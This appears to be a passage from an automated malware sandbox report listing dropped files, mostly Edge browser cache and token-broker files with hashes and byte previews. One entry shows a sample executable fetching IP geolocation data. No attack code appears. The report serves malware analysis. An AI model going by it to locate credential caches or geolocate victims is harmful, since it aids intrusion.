                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):57
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                            MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                            SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                            SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                            SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                            MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                            SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                            SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                            SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):575056
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                                                                            SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                            MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                            SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                            SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                            SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):460992
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                                                                            SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                            MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                            SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                            SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                            SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                            MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                            SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                            SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                            SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:uriCache_

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.01288062220155
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTNF0YVn:YWLSGTt1o9LuLgfGBPAzkVj/T8loy
                                                                                                                                                                                                                                                                                                                            MD5:6F8A1D74EFE547C3C04CA71C264AE56D
                                                                                                                                                                                                                                                                                                                            SHA1:E1F4032F7FAABF39215B8C9AEC4669B76FAA4AB0
                                                                                                                                                                                                                                                                                                                            SHA-256:75D67D5BA92D6579376BCCFFAD9898D088ADC8650E249D413609F38A0D8244BC
                                                                                                                                                                                                                                                                                                                            SHA-512:AAB6928F0A7C4D8451D0263F90C6020E22F23305088CFF6111F5C51730A1AEAD8B4788E2744B55556762DBF13DFD51BADBAF3C6541E40440F007EFDE8CAFA3CE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736163558559541}]}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):85
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
                                                                                                                                                                                                                                                                                                                            MD5:BC6142469CD7DADF107BE9AD87EA4753
                                                                                                                                                                                                                                                                                                                            SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
                                                                                                                                                                                                                                                                                                                            SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
                                                                                                                                                                                                                                                                                                                            SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f0b6580a-3cfc-42b2-8092-3983a06f1391.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):45000
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.095364056871153
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWONi1zNtx8Mr9NxCbf+WKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yO6haKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:AF4211D79185ECE197762B29D539D31B
                                                                                                                                                                                                                                                                                                                            SHA1:10EBFA35CCFE7CAEC18631C2078C421974F03801
                                                                                                                                                                                                                                                                                                                            SHA-256:D9CC4FC722CD90C2D96140A560E4C6F676D0CB9688B3ACD074856C1AF6ACC72C
                                                                                                                                                                                                                                                                                                                            SHA-512:BFB7E582C2A6531028D2632EBF12E99AB5C85F98DDA77849F7FF8D6C9A696CE734FEB49F1FE3ACD5C91107E3A176B774DC0D45C75E1BE7A3696DC7703EB63511
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2278
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.847643769911161
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:uiTrlKxrgxkyxl9Il8uxvawcztk1ECep9rY6d1rc:moYfaPkgDr8
                                                                                                                                                                                                                                                                                                                            MD5:22B6FA91B99C87EDE7E32F0ECF3A08B3
                                                                                                                                                                                                                                                                                                                            SHA1:C0E77EC53A10CA9A40A44FEDC51EBA2D55879D46
                                                                                                                                                                                                                                                                                                                            SHA-256:8701FC432D79E42D834A03169155B88AAB57D6BBC912A2347CB77F2012FEEFD6
                                                                                                                                                                                                                                                                                                                            SHA-512:9590DA803EBE3F987F58B30A095D932E3E5137605E3044422862E9054DD0DB755323669C8F96C0A8B62CD870E943CF2723507F81411321F3066E7F4863041A61
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L./.+.T.k.1.f.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.I.O.j.4.D.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):4622
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.999838252466345
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:k7YnTpC2F1Yn74y4Fdb1M8EqJ43/+M90iRZ5cLgVmfZkrXBF6:GgTl3Y74yqKyJt6XNeZkbj6
                                                                                                                                                                                                                                                                                                                            MD5:C2C0E54AAF1835FBB550A441C4DC3B7D
                                                                                                                                                                                                                                                                                                                            SHA1:29D6D75AA2F0C5F2E93661A4895FA7C6A0988D40
                                                                                                                                                                                                                                                                                                                            SHA-256:7613FE524201717DFC2D557E8169D380C530E981760E47766D6EC35B278EDD36
                                                                                                                                                                                                                                                                                                                            SHA-512:BD3C5DE177EDAC287AF1057FA726390320518605F73DC0BDFB0D112676CD17CCF57B339245619AD38FD9FFBF079C334A4A98E152EB33470883C23CC38A6D6DAF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.R.P.v.N.E.V.f.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.I.O.j.4.D.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2684
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.9052384058489644
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7x3xl9Il8uJ0zepKF7X839Z+mSztTFhgrcjE5d/vc:aZYP0z1g9QmutArcjE4
                                                                                                                                                                                                                                                                                                                            MD5:611725D3DE453450BBBDA549C99004E5
                                                                                                                                                                                                                                                                                                                            SHA1:DEB8F478B726C584DDAA19B1C684E5E69728CA00
                                                                                                                                                                                                                                                                                                                            SHA-256:4EE868F7A9B29B0571983AE4BF34083A227E4611A1624FFC7D8DE11E7929A726
                                                                                                                                                                                                                                                                                                                            SHA-512:B83F2B8421ADE92DC4E44BB9B463D203A8AF53D4641A5E07642BAAF8CE4FEBA0D8D6CD15756FCE3B036DD05190E2D47A1CA61073C71B0412E8511BF0F51CC526
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".M.H.F.F.Z.R.Z.+.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.I.O.j.4.D.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.019205124979377
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                                                                                                                            MD5:B62617530A8532F9AECAA939B6AB93BB
                                                                                                                                                                                                                                                                                                                            SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                                                                                                                                                                                                                                                                                            SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                                                                                                                                                                                                                                                                                            SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\3e35b4d0-bbcd-40c6-9f03-e5ad43499cd0.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8ad8fae7-7060-4ffa-b521-2539f59a01d7.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
